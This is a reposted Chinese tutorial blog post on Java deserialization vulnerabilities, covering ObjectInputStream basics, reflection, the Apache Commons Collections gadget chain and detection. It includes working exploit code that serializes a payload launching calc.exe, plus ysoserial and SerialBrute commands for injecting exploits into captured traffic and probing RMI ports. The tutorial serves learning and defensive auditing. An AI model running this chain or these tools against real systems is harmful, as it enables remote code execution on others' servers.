當(dāng)前位置：首頁(yè) > 编程资源 > 编程问答 >内容正文

编程问答

JAVA反序列化漏洞简单理解

發(fā)布時(shí)間：2024/3/26 编程问答 40 豆豆

生活随笔收集整理的這篇文章主要介紹了 JAVA反序列化漏洞简单理解小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

反序列化原理?

關(guān)于反序列化的原理不在多說(shuō)，和php類似，序列化的數(shù)據(jù)是方便存儲(chǔ)的，而存儲(chǔ)的狀態(tài)信息想要再次調(diào)用就需要反序列化?

Java反序列化的API實(shí)現(xiàn)

實(shí)現(xiàn)方法?

Java.io.ObjectOutputStream
java.io.ObjectInputStream

序列化：?　ObjectOutputStream類 -->?writeObject()

注：該方法對(duì)參數(shù)指定的obj對(duì)象進(jìn)行序列化，把字節(jié)序列寫到一個(gè)目標(biāo)輸出流中，輸出的文件為二進(jìn)制

反序列化:　ObjectInputStream類 -->?readObject()

注：該方法從一個(gè)源輸入流中讀取字節(jié)序列，再把它們反序列化為一個(gè)對(duì)象，并將其返回

對(duì)象可序列化的要求

實(shí)現(xiàn)Serializable和Externalizable接口的類的對(duì)象才能被序列化

Externalizable接口繼承自 Serializable接口，實(shí)現(xiàn)Externalizable接口的類完全由自身來(lái)控制序列化的行為，而僅實(shí)現(xiàn)Serializable接口的類可以采用默認(rèn)的序列化方式

序列化實(shí)例

下面給出一個(gè)序列化的實(shí)例，首先是實(shí)現(xiàn)Serializable接口待序列化對(duì)象

public class Employee implements java.io.Serializable{//定義實(shí)現(xiàn)了Serializable接口的Employee類public String name; //定義name變量public String identify; //定義身份變量public void mailCheck(){System.out.println("This is the "+this.identify+" of our company");} //輸出函數(shù) }

序列化類代碼如下

import java.io.*;public class sdemo { //序列化類public static void main(String [] args) //主函數(shù){Employee e = new Employee(); //實(shí)例化Employee類e.name = "admin"; e.identify = "admin"; //實(shí)例化類的屬性try //抓取異常{FileOutputStream fileOut = new FileOutputStream("E:\\test\\test.db"); // 打開一個(gè)文件輸入流ObjectOutputStream out = new ObjectOutputStream(fileOut);// 建立對(duì)象輸入流out.writeObject(e);//輸出反序列化對(duì)象out.close();//關(guān)閉對(duì)象流fileOut.close();//關(guān)閉文件流System.out.printf("數(shù)據(jù)保存在 E:\\test\\test.db文件中");}catch(IOException i){i.printStackTrace();}} }

執(zhí)行函數(shù)，如下

文件內(nèi)容如下，也不是很好看懂，畢竟是二進(jìn)制文件，直接打開會(huì)亂碼

而文件的二進(jìn)制形態(tài)是什么樣呢？

java序列化的數(shù)據(jù)庫(kù)一般都是aced0005開頭，當(dāng)然嚴(yán)格來(lái)說(shuō)應(yīng)該是aced開頭，0005有時(shí)候會(huì)不太一樣，我昨天的序列化數(shù)據(jù)就是2005，查詢某些資料說(shuō)是跟什么版本有關(guān)

下面我們對(duì) test.db 文件進(jìn)行反序列化，代碼如下

import java.io.*;public class UnSDemo {public static void main(String [] args){Employee e = null;//和php類似，我們需要有個(gè)對(duì)象來(lái)接受反序列化的數(shù)據(jù)try{FileInputStream fileIn = new FileInputStream("E:\\test\\test.db");// 打開一個(gè)文件輸入流ObjectInputStream in = new ObjectInputStream(fileIn);// 建立對(duì)象輸入流e = (Employee) in.readObject();// 通過(guò)readobject方法讀取對(duì)象in.close();//關(guān)閉對(duì)象流fileIn.close();//關(guān)閉文件流}catch(IOException i) {i.printStackTrace();return;}catch(ClassNotFoundException c) {System.out.println("未發(fā)現(xiàn)test.db文件");c.printStackTrace();return;}System.out.println("反序列化成功...");System.out.println("Name: " + e.name);System.out.println("identify： "+e.identify);} }

執(zhí)行結(jié)果如下

反序列化漏洞

與php飯學(xué)列化漏洞類似，要想產(chǎn)生漏洞，必要的條件就是參數(shù)可控啊

而我們?cè)诶梅葱蛄谢┒吹臅r(shí)候肯定是想getshell或者命令執(zhí)行啊，但是默認(rèn)的readobject方法是無(wú)法幫我們實(shí)現(xiàn)這些要求的，下面說(shuō)一下漏洞的兩大成因

開發(fā)失誤

開發(fā)人員對(duì)反序列化完全沒有進(jìn)行安全審查，在被序列化的對(duì)象類中重寫了readobject方法，那么在反序列的過(guò)程中，會(huì)使用被反序列化類的readObejct方法

如下代碼會(huì)成功彈出計(jì)算器

package com.test; import java.io.*;public class test {public static void main(String args[]) throws Exception{UnsafeClass Unsafe = new UnsafeClass();Unsafe.name = "彈出計(jì)算器";FileOutputStream fos = new FileOutputStream("object");ObjectOutputStream os = new ObjectOutputStream(fos);//writeObject()方法將Unsafe對(duì)象寫入object文件os.writeObject(Unsafe);os.close();//從文件中反序列化obj對(duì)象FileInputStream fis = new FileInputStream("object");ObjectInputStream ois = new ObjectInputStream(fis);//恢復(fù)對(duì)象UnsafeClass objectFromDisk = (UnsafeClass)ois.readObject();System.out.println(objectFromDisk.name);ois.close();} } class UnsafeClass implements Serializable{public String name;//重寫readObject()方法private void readObject(java.io.ObjectInputStream in) throws IOException, ClassNotFoundException{//執(zhí)行默認(rèn)的readObject()方法in.defaultReadObject();//執(zhí)行命令Runtime.getRuntime().exec("calc.exe");} }

如上圖我們?cè)赨nsafeClass類中定義了name屬性，并且重寫了readobject方法，在原有的基礎(chǔ)上添加了執(zhí)行命令的代碼，最中彈出計(jì)算器

而在實(shí)際環(huán)境中，有些常識(shí)的開發(fā)者都不會(huì)直接將命令寫在readObject中，因此此處就需要通過(guò)反射鏈來(lái)進(jìn)行任意代碼執(zhí)行了

基礎(chǔ)庫(kù)中的反序列化漏洞

2015年由黑客Gabriel Lawrence和Chris Frohoff發(fā)現(xiàn)的‘Apache Commons Collections’類庫(kù)直接影響了WebLogic、WebSphere、JBoss、Jenkins、OpenNMS等大型框架。直到今天該漏洞的影響仍未消散。

存在危險(xiǎn)的基礎(chǔ)庫(kù)

commons-fileupload 1.3.1
commons-io 2.4
commons-collections 3.1
commons-logging 1.2
commons-beanutils 1.9.2
org.slf4j:slf4j-api 1.7.21
com.mchange:mchange-commons-java 0.2.11
org.apache.commons:commons-collections 4.0
com.mchange:c3p0 0.9.5.2
org.beanshell:bsh 2.0b5
org.codehaus.groovy:groovy 2.3.9
org.springframework:spring-aop 4.1.4.RELEASE

基礎(chǔ)庫(kù)中的調(diào)用流程一般都比較復(fù)雜，比如org.apache.commons.collections.functors.InvokerTransformer的POP鏈就涉及反射、泛型等

源碼分析

在這里針對(duì)Apache Commons Collections庫(kù)進(jìn)行分析，此漏洞版本是3.2.2以下，在4.4版本中甚至直接刪除了相關(guān)類

官網(wǎng)下載：http://commons.apache.org/proper/commons-collections/download_collections.cgi

其他追蹤分析類文章

Java反序列化漏洞-玄鐵重劍之CommonsCollection(上)
Java反序列化漏洞-玄鐵重劍之CommonsCollection(下)

概念引入

java中的反射機(jī)制

反射機(jī)制是java的一個(gè)非常重要的機(jī)制，一些著名的應(yīng)用框架都使用了此機(jī)制，如struts、spring、hibernate、android app界面等

java.lang.Class它是java語(yǔ)法的一個(gè)基礎(chǔ)類，用于描述一個(gè)class對(duì)象。在文件系統(tǒng)中，class以文件的形式存在。在運(yùn)行的JVM中，*.class文件被加載到內(nèi)存中成為一個(gè)對(duì)象，該對(duì)象的類型就是java.lang.Class

什么是反射？

在運(yùn)行狀態(tài)中

對(duì)于任意一個(gè)類，都能夠獲取到這個(gè)類的所有屬性和方法
對(duì)于任意一個(gè)對(duì)象，都能夠調(diào)用它的任意一個(gè)方法和屬性(包括私有的方法和屬性)

這種動(dòng)態(tài)獲取信息以及動(dòng)態(tài)調(diào)用對(duì)象的方法的功能就稱為java語(yǔ)言的反射機(jī)制

也就是說(shuō)，雖然我們獲取不到該類的源代碼，但是通過(guò)該類的.class文件能反射(Reflect)出這些信息

簡(jiǎn)單來(lái)說(shuō)

反射機(jī)制指的是程序在運(yùn)行時(shí)能夠獲取自身的信息。在java中，只要給定類的名字，那么就可以通過(guò)反射機(jī)制來(lái)獲得類的所有信息

獲取.class字節(jié)碼文件對(duì)象

獲取字節(jié)碼文件對(duì)象的三種方式，有了字節(jié)碼文件對(duì)象才能獲得類中所有的信息，我們?cè)谑褂梅瓷浍@取信息時(shí)，也要考慮使用下面哪種方式獲取字節(jié)碼對(duì)象合理，視不同情況而定

//方法一 Class clazz1 = Class.forName("my.Student");//通過(guò)Class類中的靜態(tài)方法forName，直接獲取到一個(gè)類的字節(jié)碼文件對(duì)象，此時(shí)該類還是源文件階段，并沒有變?yōu)樽止?jié)碼文件。包名為 my，類名為 Student //方法二 Class clazz2?= Student.class; ?//當(dāng)類被加載成.class文件時(shí)，此時(shí)Student.java類變成了Student.class，該類處于字節(jié)碼階段 //方法三 Student s=new Student(); ? ?//實(shí)例化Student對(duì)象 Class clazz3 = s.getClass();　//通過(guò)該類的實(shí)例獲取該類的字節(jié)碼文件對(duì)象，該類處于創(chuàng)建對(duì)象階段

通過(guò)反射機(jī)制執(zhí)行函數(shù)

下面的代碼中我們利用JAVA?的反射機(jī)制來(lái)調(diào)用計(jì)算器。我們利用了Java的反射機(jī)制把我們的代碼意圖都利用字符串的形式進(jìn)行體現(xiàn)，使得原本應(yīng)該是字符串的屬性，變成了代碼執(zhí)行的邏輯

package com.test; import java.lang.reflect.InvocationTargetException;public class FansheTest {public static void main(String[] args) throws IllegalAccessException, IllegalArgumentException, InvocationTargetException, NoSuchMethodException, SecurityException, ClassNotFoundException {Object runtime=Class.forName("java.lang.Runtime").getMethod("getRuntime",new Class[]{}).invoke(null); //得到Runtime.getRuntime()函數(shù)Class.forName("java.lang.Runtime").getMethod("exec", String.class).invoke(runtime,"calc.exe"); //執(zhí)行函數(shù)} }

什么是反射鏈？

沒有找到具體概念，大概理解一下就是，既然是鏈，類似于php中的pop鏈應(yīng)該也是牽扯到了多種類或者對(duì)象，相互間的調(diào)用來(lái)達(dá)成目標(biāo)，這可能就是個(gè)反射鏈吧

代碼跟蹤

看了網(wǎng)上許多的文章都是先分析TransformedMap類以及transform()方法的，當(dāng)然這種分析是從發(fā)現(xiàn)漏洞的角度。而我，作為一個(gè)剛學(xué)習(xí)的菜雞，我表示看了十幾篇文章越看越懵逼，畢竟對(duì)java代碼不熟悉，改天還是得找個(gè)同學(xué)給講講

而接下來(lái)，我們已知漏洞存在，我們?nèi)ジ櫬┒吹拇a，首先此漏洞是存在于Apache Commons Collections第三方基礎(chǔ)庫(kù)中的，而前面我們已經(jīng)提及要想產(chǎn)生漏洞我們需要對(duì)readobject方法進(jìn)行重寫，我們發(fā)現(xiàn)了這么一個(gè)類，但這個(gè)類應(yīng)該是不在Apache Commons Collections庫(kù)中的，這個(gè)類是AnnotationInvocationHandler類

下面是新版本的代碼，可以說(shuō)程序員太叼了。。全給換成了var1-12.?？吹氖且荒樸卤?#xff0c;而且新版本添加了UnsafeAccessor類做安全檢測(cè)，代碼如下

private void readObject(ObjectInputStream var1) throws IOException, ClassNotFoundException {GetField var2 = var1.readFields();Class var3 = (Class)var2.get("type", (Object)null);Map var4 = (Map)var2.get("memberValues", (Object)null);AnnotationType var5 = null;try {var5 = AnnotationType.getInstance(var3);} catch (IllegalArgumentException var13) {throw new InvalidObjectException("Non-annotation type in annotation serial stream");}Map var6 = var5.memberTypes();LinkedHashMap var7 = new LinkedHashMap();String var10;Object var11;for(Iterator var8 = var4.entrySet().iterator(); var8.hasNext(); var7.put(var10, var11)) {Entry var9 = (Entry)var8.next();var10 = (String)var9.getKey();var11 = null;Class var12 = (Class)var6.get(var10);if (var12 != null) {var11 = var9.getValue();if (!var12.isInstance(var11) && !(var11 instanceof ExceptionProxy)) {var11 = (new AnnotationTypeMismatchExceptionProxy(var11.getClass() + "[" + var11 + "]")).setMember((Method)var5.members().get(var10));}}}AnnotationInvocationHandler.UnsafeAccessor.setType(this, var3);AnnotationInvocationHandler.UnsafeAccessor.setMemberValues(this, var7);}

感覺還是老版本的更加人性一點(diǎn)啊，所以還是找一下老版本代碼，最后能不能復(fù)現(xiàn)成功就看緣分了，反正我也不敢亂刪

class AnnotationInvocationHandler implements InvocationHandler, Serializable {private final Class<? extends Annotation> type;private final Map<String, Object> memberValues;AnnotationInvocationHandler(Class<? extends Annotation> type, Map<String, Object> memberValues) {this.type = type;this.memberValues = memberValues;}.. //AnnotationInvocationHandler的readObject()函數(shù)中對(duì)memberValues的每一項(xiàng)調(diào)用了setValue()函數(shù)private void readObject(java.io.ObjectInputStream s) throws java.io.IOException, ClassNotFoundException {s.defaultReadObject(); // Check to make sure that types have not evolved incompatibly AnnotationType annotationType = null;try {annotationType = AnnotationType.getInstance(type);} catch(IllegalArgumentException e) {// Class is no longer an annotation type; all bets are offreturn;}Map<String, Class<?>> memberTypes = annotationType.memberTypes();for (Map.Entry<String, Object> memberValue : memberValues.entrySet()) {String name = memberValue.getKey();Class<?> memberType = memberTypes.get(name);if (memberType != null) { // i.e. member still existsObject value = memberValue.getValue();if (!(memberType.isInstance(value) || value instanceof ExceptionProxy)) {memberValue.setValue( new AnnotationTypeMismatchExceptionProxy(value.getClass() + "[" + value + "]").setMember( annotationType.members().get(name)));}}}} }

上面的代碼我們可以知道，這個(gè)類有一個(gè)成員變量memberValues，是Map.Entry<String, Object>類型，并且在重寫的 readObject() 方法中有 memberValue.setValue()?修改Value的操作

接下來(lái)就該跟蹤Map是個(gè)什么鬼，setValue又是操作，會(huì)有什么用呢？

Map類 -->?TransformedMap

Map類是存儲(chǔ)鍵值對(duì)的數(shù)據(jù)結(jié)構(gòu)。 Apache Commons Collections中實(shí)現(xiàn)了TransformedMap ，該類可以在一個(gè)元素被添加/刪除/或是被修改時(shí)(即key或value：集合中的數(shù)據(jù)存儲(chǔ)形式即是一個(gè)索引對(duì)應(yīng)一個(gè)值，就像身份證與人的關(guān)系那樣)

該庫(kù)定義了TransformedMap結(jié)構(gòu)，其定義了一個(gè)靜態(tài)方法decorate()，可以完成Map結(jié)構(gòu)的轉(zhuǎn)換

public static Map decorate(Map map, Transformer keyTransformer, Transformer valueTransformer) {return new TransformedMap(map, keyTransformer, valueTransformer); }

用此靜態(tài)方法實(shí)現(xiàn)Map類的轉(zhuǎn)換

Map oldMap = new HashMap(); Map newMap = TransformedMap.decorate(oldMap,keyTransformer,valueTransformer);

當(dāng)TransformedMap的setValue()方法被調(diào)用時(shí)，會(huì)調(diào)用抽閑父類AbstractInputCheckedMapDecorator的setValue()方法

public Object setValue(Object value) {value = this.parent.checkSetValue(value);return this.entry.setValue(value); }

接著我們又回到TransformedMap的checkSetValue方法，從而調(diào)用了transform()方法，并且，transform()方法的參數(shù)就是setValue()方法的參數(shù)

protected Object checkSetValue(Object value) {return this.valueTransformer.transform(value);}

接下來(lái)跟進(jìn)代碼，我們需要知道那里定義了transform()方法，發(fā)現(xiàn)定義了一個(gè)Transformer接口，其代碼如下

其中定義的transform()方法用來(lái)將一個(gè)對(duì)象轉(zhuǎn)換成另一個(gè)對(duì)象

public interface Transformer {public Object transform(Object input); }

注意在Apache的commons-collections.jar中，默認(rèn)實(shí)現(xiàn)了ConstantTransformer，InvokerTransformer，ChainedTransformer幾個(gè)實(shí)現(xiàn)，但我們僅需重點(diǎn)關(guān)注InvokerTransformer類，查看其transform()方法，下面是類的代碼

public class InvokerTransformer implements Transformer, Serializable {/*Input參數(shù)為要進(jìn)行反射的對(duì)象，iMethodName,iParamTypes為調(diào)用的方法名稱以及該方法的參數(shù)類型iArgs為對(duì)應(yīng)方法的參數(shù)在invokeTransformer這個(gè)類的構(gòu)造函數(shù)中我們可以發(fā)現(xiàn)，這三個(gè)參數(shù)均為可控參數(shù) */private static final long serialVersionUID = -8653385846894047688L;private final String iMethodName;private final Class[] iParamTypes;private final Object[] iArgs;public static Transformer getInstance(String methodName) {if (methodName == null) {throw new IllegalArgumentException("The method to invoke must not be null");}return new InvokerTransformer(methodName);}public static Transformer getInstance(String methodName, Class[] paramTypes, Object[] args) {if (methodName == null) {throw new IllegalArgumentException("The method to invoke must not be null");}if (((paramTypes == null) && (args != null))|| ((paramTypes != null) && (args == null))|| ((paramTypes != null) && (args != null) && (paramTypes.length != args.length))) {throw new IllegalArgumentException("The parameter types must match the arguments");}if (paramTypes == null || paramTypes.length == 0) {return new InvokerTransformer(methodName);} else {paramTypes = (Class[]) paramTypes.clone();args = (Object[]) args.clone();return new InvokerTransformer(methodName, paramTypes, args);}}private InvokerTransformer(String methodName) {super();iMethodName = methodName;iParamTypes = null;iArgs = null;}public InvokerTransformer(String methodName, Class[] paramTypes, Object[] args) {super();iMethodName = methodName;iParamTypes = paramTypes;iArgs = args;}public Object transform(Object input) {if (input == null) {return null;}try {Class cls = input.getClass();Method method = cls.getMethod(iMethodName, iParamTypes);return method.invoke(input, iArgs); } catch (NoSuchMethodException ex) {throw new FunctorException("InvokerTransformer: The method '" + iMethodName + "' on '" + input.getClass() + "' does not exist");} catch (IllegalAccessException ex) {throw new FunctorException("InvokerTransformer: The method '" + iMethodName + "' on '" + input.getClass() + "' cannot be accessed");} catch (InvocationTargetException ex) {throw new FunctorException("InvokerTransformer: The method '" + iMethodName + "' on '" + input.getClass() + "' threw an exception", ex);}}private void writeObject(ObjectOutputStream os) throws IOException {FunctorUtils.checkUnsafeSerialization(InvokerTransformer.class);os.defaultWriteObject();}private void readObject(ObjectInputStream is) throws ClassNotFoundException, IOException {FunctorUtils.checkUnsafeSerialization(InvokerTransformer.class);is.defaultReadObject();} }

可以看到，上面的transform()，通過(guò)java 反射調(diào)用了input的iMethodName方法

并且 iMethodName 是通過(guò)InvokerTransformer函數(shù)的傳參值得到的，就是說(shuō)iMethodName方法可控

這樣的結(jié)果就是，只要transform()方法被調(diào)用（已再M(fèi)ap類中調(diào)用，用來(lái)checkSetValue），我們的惡意代碼就能被執(zhí)行

下面再介紹兩個(gè)類

ChainedTransformer為鏈?zhǔn)降腡ransformer，會(huì)挨個(gè)執(zhí)行我們定義的?Transformer
ConstantTransformer類通過(guò)transform轉(zhuǎn)換得到內(nèi)部類的對(duì)象類型，如參數(shù)是Runtime.class時(shí)，經(jīng)ConstantTransformer類執(zhí)行后返回java.lang.Runtime

理一下思路

首先構(gòu)造一個(gè)Map和一個(gè)能夠執(zhí)行代碼的ChainedTransformer，
生成一個(gè)TransformedMap實(shí)例
實(shí)例化AnnotationInvocationHandler，其成員變量memberValues就是TransformedMap實(shí)例，并對(duì)其進(jìn)行序列化，
當(dāng)觸發(fā)readObject()反序列化的時(shí)候，就能實(shí)現(xiàn)命令執(zhí)行

import java.io.FileInputStream; import java.io.FileOutputStream; import java.io.IOException; import java.io.ObjectInputStream; import java.io.ObjectOutputStream; import java.lang.annotation.Target; import java.lang.reflect.Constructor; import java.util.HashMap; import java.util.Map; import java.util.Map.Entry;import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; import org.apache.commons.collections.functors.InvokerTransformer; import org.apache.commons.collections.map.TransformedMap;public class main2 {public static void main(String[] args) throws Exception{Transformer[] transformers = new Transformer[] {new ConstantTransformer(Runtime.class),new InvokerTransformer("getMethod", new Class[] {String.class, Class[].class }, new Object[] {"getRuntime", new Class[0] }),new InvokerTransformer("invoke", new Class[] {Object.class, Object[].class }, new Object[] {null, new Object[0] }),new InvokerTransformer("exec", new Class[] {String.class }, new Object[] {"calc.exe"})};Transformer transformedChain = new ChainedTransformer(transformers); //實(shí)例化一個(gè)反射鏈Map innerMap = new HashMap(); //實(shí)例化一個(gè)Map對(duì)象innerMap.put("value", "value");Map outerMap = TransformedMap.decorate(innerMap, null, transformedChain); //將Map對(duì)象和反射鏈作為參數(shù)傳入Class cl = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler"); //得到 AnnotationInvocationHandler類的字節(jié)碼文件Constructor ctor = cl.getDeclaredConstructor(Class.class, Map.class);ctor.setAccessible(true);Object instance = ctor.newInstance(Target.class, outerMap); //得到我們構(gòu)造好的 AnnotationInvocationHandler類實(shí)例FileOutputStream f = new FileOutputStream("payload.bin");ObjectOutputStream out = new ObjectOutputStream(f); //創(chuàng)建一個(gè)對(duì)象輸出流out.writeObject(instance); //將我們構(gòu)造的 AnnotationInvocationHandler類進(jìn)行序列化out.flush();out.close();} }

如何發(fā)現(xiàn)Java反序列化漏洞

白盒檢測(cè)

當(dāng)持有程序源碼時(shí)，可以采用這種方法，逆向?qū)ふ衣┒础?/p>

反序列化操作一般應(yīng)用在導(dǎo)入模板文件、網(wǎng)絡(luò)通信、數(shù)據(jù)傳輸、日志格式化存儲(chǔ)、對(duì)象數(shù)據(jù)落磁盤、或DB存儲(chǔ)等業(yè)務(wù)場(chǎng)景。因此審計(jì)過(guò)程中重點(diǎn)關(guān)注這些功能板塊。

流程如下：

① 通過(guò)檢索源碼中對(duì)反序列化函數(shù)的調(diào)用來(lái)靜態(tài)尋找反序列化的輸入點(diǎn)
可以搜索以下函數(shù)：

ObjectInputStream.readObject ObjectInputStream.readUnshared XMLDecoder.readObject Yaml.load XStream.fromXML ObjectMapper.readValue JSON.parseObject

小數(shù)點(diǎn)前面是類名，后面是方法名

② 確定了反序列化輸入點(diǎn)后，再考察應(yīng)用的Class Path中是否包含Apache Commons Collections等危險(xiǎn)庫(kù)（ysoserial所支持的其他庫(kù)亦可）。

③ 若不包含危險(xiǎn)庫(kù)，則查看一些涉及命令、代碼執(zhí)行的代碼區(qū)域，防止程序員代碼不嚴(yán)謹(jǐn)，導(dǎo)致bug。

④ 若包含危險(xiǎn)庫(kù)，則使用ysoserial進(jìn)行攻擊復(fù)現(xiàn)。

黑盒檢測(cè)

在黑盒測(cè)試中并不清楚對(duì)方的代碼架構(gòu)，但仍然可以通過(guò)分析十六進(jìn)制數(shù)據(jù)塊，鎖定某些存在漏洞的通用基礎(chǔ)庫(kù)（比如Apache Commons Collection）的調(diào)用地點(diǎn)，并進(jìn)行數(shù)據(jù)替換，從而實(shí)現(xiàn)利用。
在實(shí)戰(zhàn)過(guò)程中，我們可以通過(guò)抓包來(lái)檢測(cè)請(qǐng)求中可能存在的序列化數(shù)據(jù)。
序列化數(shù)據(jù)通常以AC ED開始，之后的兩個(gè)字節(jié)是版本號(hào)，版本號(hào)一般是00 05但在某些情況下可能是更高的數(shù)字。
為了理解反序列化數(shù)據(jù)樣式，我們使用以下代碼舉例：

import java.io.*;public class SerializeDemo {public static void main(String [] args){Employee e = new Employee();e.name = "員工甲";e.identify = "General staff";try{// 打開一個(gè)文件輸入流FileOutputStream fileOut =new FileOutputStream("D:\\Task\\employee1.db");// 建立對(duì)象輸入流ObjectOutputStream out = new ObjectOutputStream(fileOut);//輸出反序列化對(duì)象out.writeObject(e);out.close();fileOut.close();System.out.printf("Serialized data is saved in D:\\Task\\employee1.db");}catch(IOException i){i.printStackTrace();}} }

在本地環(huán)境下運(yùn)行一下，即可看到生成的employee1.db文件。
生成的employee1.db反序列化數(shù)據(jù)為（可用Winhex、Sublime等工具打開）：

需要注意的是，AC ED 00 05是常見的序列化數(shù)據(jù)開始，但有些應(yīng)用程序在整個(gè)運(yùn)行周期中保持與服務(wù)器的網(wǎng)絡(luò)連接，如果攻擊載荷是在延遲中發(fā)送的，那檢測(cè)這四個(gè)字節(jié)就是無(wú)效的。所以有些防火墻工具在檢測(cè)反序列化數(shù)據(jù)時(shí)僅僅檢測(cè)這幾個(gè)字節(jié)是不安全的設(shè)置。

所以我們也要對(duì)序列化轉(zhuǎn)儲(chǔ)過(guò)程中出現(xiàn)的Java類名稱進(jìn)行檢測(cè)，Java類名稱可能會(huì)以“L”開頭的替代格式出現(xiàn) ，以';'結(jié)尾，并使用正斜杠來(lái)分隔命名空間和類名（例如 “Ljava / rmi / dgc / VMID;”）。除了Java類名，由于序列化格式規(guī)范的約定，還有一些其他常見的字符串，例如：表示對(duì)象（TC_OBJECT），后跟其類描述（TC_CLASSDESC）的'sr'或可能表示沒有超類（TC_NULL）的類的類注釋（TC_ENDBLOCKDATA）的'xp'。

識(shí)別出序列化數(shù)據(jù)后，就要定位插入點(diǎn)，不同的數(shù)據(jù)類型有以下的十六進(jìn)制對(duì)照表：

0x70 - TC_NULL 0x71 - TC_REFERENCE 0x72 - TC_CLASSDESC 0x73 - TC_OBJECT 0x74 - TC_STRING 0x75 - TC_ARRAY 0x76 - TC_CLASS 0x7B - TC_EXCEPTION 0x7C - TC_LONGSTRING 0x7D - TC_PROXYCLASSDESC 0x7E - TC_ENUM

AC ED 00 05之后可能跟上述的數(shù)據(jù)類型說(shuō)明符，也可能跟77(TC_BLOCKDATA元素)或7A(TC_BLOCKDATALONG元素)其后跟的是塊數(shù)據(jù)。

序列化數(shù)據(jù)信息是將對(duì)象信息按照一定規(guī)則組成的，那我們根據(jù)這個(gè)規(guī)則也可以逆向推測(cè)出數(shù)據(jù)信息中的數(shù)據(jù)類型等信息。并且有大牛寫好了現(xiàn)成的工具-SerializationDumper

用法：
java -jar SerializationDumper-v1.0.jar aced000573720008456d706c6f796565eae11e5afcd287c50200024c00086964656e746966797400124c6a6176612f6c616e672f537472696e673b4c00046e616d6571007e0001787074000d47656e6572616c207374616666740009e59198e5b7a5e794b2

后面跟的十六進(jìn)制字符串即為序列化后的數(shù)據(jù)

工具自動(dòng)解析出包含的數(shù)據(jù)類型之后，就可以替換掉TC_BLOCKDATE進(jìn)行替換了。AC ED 00 05經(jīng)過(guò)Base64編碼之后為rO0AB

在實(shí)戰(zhàn)過(guò)程中，我們可以通過(guò)tcpdump抓取TCP/HTTP請(qǐng)求，通過(guò)SerialBrute.py去自動(dòng)化檢測(cè)，并插入ysoserial生成的exp

SerialBrute.py -r <file> -c <command> [opts]
SerialBrute.py -p <file> -t <host:port> -c <command> [opts]

使用ysoserial.jar訪問(wèn)請(qǐng)求記錄判斷反序列化漏洞是否利用成功：
java -jar ysoserial.jar CommonsCollections1 'curl " + URL + " '

當(dāng)懷疑某個(gè)web應(yīng)用存在Java反序列化漏洞，可以通過(guò)以上方法掃描并爆破攻擊其RMI或JMX端口（默認(rèn)1099）。

參考文章

https://www.cnblogs.com/KevinGeorge/p/8448967.html

https://xz.aliyun.com/t/2041

https://www.freebuf.com/articles/web/149931.html

https://www.jianshu.com/p/4060bb2e24cb

https://www.freebuf.com/column/155381.html

https://blog.csdn.net/u010651541/article/details/78369181

總結(jié)

以上是生活随笔為你收集整理的JAVA反序列化漏洞简单理解的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。